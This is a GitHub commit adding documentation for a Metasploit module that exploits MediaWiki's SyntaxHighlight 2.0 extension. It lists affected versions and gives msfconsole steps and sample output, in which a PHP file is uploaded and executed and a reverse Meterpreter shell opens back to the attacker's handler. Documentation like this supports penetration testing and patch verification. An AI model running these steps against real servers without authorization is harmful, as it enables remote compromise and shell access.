Skip to content

Commit 0eb79e8

Browse files
authored
Added docs for mediawiki_syntaxhighlight.rb
1 parent f9e7715 commit 0eb79e8

File tree

1 file changed

+30
-0
lines changed

1 file changed

+30
-0
lines changed
Lines changed: 30 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,30 @@
1+
## Vulnerable Application
2+
3+
Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. This issue was supposed to be fixed in MediaWiki version 1.28.1 and version 1.27.2. It appears that the fix was pushed to the git repository, but for some reason it was not included in the release packages.
4+
5+
## Verification Steps
6+
7+
1. `use exploit/multi/http/mediawiki_syntaxhighlight`
8+
2. `set RHOST <ip target site>`
9+
3. `set TARGETURI <MediaWiki path>`
10+
4. `set UPLOADPATH <writable path in web root>`
11+
5. optionally set `RPORT`, `SSL`, and `VHOST`
12+
6. `exploit`
13+
7. **Verify** a new Meterpreter session is started
14+
15+
## Sample Output
16+
17+
```
18+
msf > use exploit/multi/http/mediawiki_syntaxhighlight
19+
msf exploit(mediawiki_syntaxhighlight) > set RHOST 192.168.146.137
20+
RHOST => 192.168.146.137
21+
msf exploit(mediawiki_syntaxhighlight) > set TARGETURI /mediawiki
22+
TARGETURI => /mediawiki
23+
msf exploit(mediawiki_syntaxhighlight) > exploit
24+
25+
[*] Started reverse TCP handler on 192.168.146.197:4444
26+
[*] Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php
27+
[*] Trying to run /mediawiki/images/bwpqtiqgmeydivskjcjltnldb.php
28+
[*] Sending stage (33986 bytes) to 192.168.146.137
29+
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.137:55768) at 2017-04-29 14:27:03 +0200
30+
```

0 commit comments

Comments
 (0)